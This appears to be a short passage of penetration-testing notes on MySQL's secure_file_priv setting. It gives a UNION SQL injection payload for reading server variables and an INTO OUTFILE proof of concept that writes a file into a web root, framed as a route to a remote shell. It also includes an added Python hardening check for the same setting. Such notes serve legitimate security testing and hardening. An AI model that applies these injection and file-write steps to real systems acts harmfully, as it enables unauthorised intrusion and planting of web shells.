Prerequisites
This should not be enabled on any modern, secure system, but if it is, you can use it to create a remote shell.
secure_file_priv can have the following values:
null: cannot write anywhere on system
"" (empty string): can write anywhere
"/path/to/dir": can write only to specified path
SHOW VARIABLES LIKE 'secure_file_priv';
You can get this by querying the information_schema using a union injection:
UNION SELECT VARIABLE_NAME,VARIABLE_VALUE FROM INFORMATION_SCHEMA.GLOBAL_VARIABLES
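For hardening reviews, the three secure_file_priv values listed above can be checked against the directories the web server serves. This is an added example, not part of the original notes; the function name, the result keys and the default web root are assumptions.

```python
import posixpath


def _overlaps(a, b):
    """True if directory a is inside b, or b is inside a (both absolute)."""
    a, b = posixpath.normpath(a), posixpath.normpath(b)
    # commonpath compares whole path components, so /var/www/html2
    # is not treated as being inside /var/www/html.
    return posixpath.commonpath([a, b]) in (a, b)


def assess_secure_file_priv(value, web_roots=("/var/www/html",)):
    """Classify a secure_file_priv value and list the web roots it reaches.

    value: what the driver returns for the variable (None for SQL NULL).
    web_roots: assumed list of directories served by the web server.
    """
    roots = [posixpath.normpath(r) for r in web_roots]
    # The mysql CLI prints SQL NULL as the text "NULL"; accept both forms.
    if value is None or value.strip().upper() == "NULL":
        return {"scope": "disabled", "exposed_roots": [], "review": False}
    directory = value.strip()
    if directory == "":
        # No directory restriction: only OS file permissions limit writes.
        return {"scope": "unrestricted", "exposed_roots": roots, "review": True}
    if not posixpath.isabs(directory):
        # A relative value cannot be compared with absolute web roots here.
        return {"scope": "restricted", "exposed_roots": [], "review": True}
    exposed = [r for r in roots if _overlaps(directory, r)]
    return {"scope": "restricted", "exposed_roots": exposed,
            "review": bool(exposed)}


if __name__ == "__main__":
    # Constructed sample values, not taken from a real server.
    for sample in (None, "", "/var/lib/mysql-files/", "/var/www/"):
        print(repr(sample), assess_secure_file_priv(sample))
```

Any result with review set to True means the export directory should be moved away from served content or the variable set to NULL.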
Do it
SELECT "OOPS!" INTO OUTFILE "/var/www/html/poc.txt"